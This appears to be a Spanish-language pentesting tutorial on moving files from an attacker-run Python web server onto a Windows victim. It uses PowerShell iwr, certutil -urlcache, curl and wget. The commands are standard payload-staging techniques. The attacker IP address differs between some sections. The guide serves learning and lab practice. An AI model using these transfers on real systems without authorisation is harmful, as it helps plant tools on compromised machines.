Descargando desde Windows

1. Usando Invoke-WebRequest (IWR)

Máquina del Atacante:

Primero, navega al directorio local desde donde vas a subir el archivo a la máquina víctima. El comando Python ejecutado con “SimpleHTTPServer” en el puerto 80 crea y inicia instantáneamente el servidor web para acceder y transferir los archivos en el directorio de trabajo actual. Este es uno de los métodos más sencillos para transferir archivos.

Comando:

python -m SimpleHTTPServer 80

Máquina Víctima:

En la máquina víctima, ejecuta el siguiente comando en PowerShell para descargar el archivo desde la máquina atacante.

Comando:

powershell.exe -command iwr -Uri http://192.168.68.68/file.txt -OutFile C:\Temp\fileoutput.txt

Nota: iwr es la abreviatura de Invoke-WebRequest, que es una parte de la utilidad de Microsoft PowerShell.

También puedes probar con el siguiente comando:

powershell.exe iwr -uri http://192.168.1.2/file.txt -o C:\Temp\fileoutput.txt

2. Usando Certutil

El propósito original de certutil era para la gestión de certificados y Autoridades Certificadoras (CA), pero también puede ser utilizado para la transferencia de archivos.

Máquina del Atacante:

Usaremos el mismo SimpleHTTP Server en el puerto 80 en la máquina atacante para enviar el archivo desde ese directorio.

Comando:

python -m SimpleHTTPServer 80

Máquina Víctima:

En la máquina víctima, ejecuta el siguiente comando para descargar el archivo desde la máquina atacante.

Comando:

certutil -urlcache -f http://192.168.62.68/file.txt file.txt

3. Usando Curl

Curl es una herramienta de línea de comandos en Linux que se utiliza para compartir datos entre servidores y que ahora también está disponible en cmd de Windows.

Máquina del Atacante:

Usaremos el mismo SimpleHTTP Server en el puerto 80 en la máquina atacante para enviar el archivo desde ese directorio.

Comando:

python -m SimpleHTTPServer 80

Máquina Víctima:

En la máquina víctima, ejecuta el siguiente comando para descargar el archivo desde la máquina atacante.

Comando:

curl http://192.168.1.2/file.txt -o fileout.txt

4. Usando Wget

La función de wget es recuperar contenido desde servidores web disponibles. Ahora vamos a descargar un archivo desde la máquina atacante usando PowerShell en la máquina víctima.

Máquina del Atacante:

Ejecuta el SimpleHTTP Server en el puerto 80 en la máquina atacante para enviar el archivo desde ese directorio.

Comando:

python -m SimpleHTTPServer 80

Máquina Víctima:

Abre PowerShell en la máquina Windows y ejecuta el siguiente comando. Menciona la ruta desde la cual descargar el archivo y luego especifica la ruta de salida para guardar el archivo.

Comando:

wget http://192.168.1.2/file.txt -OutFile C:\Temp\fileoutput.txt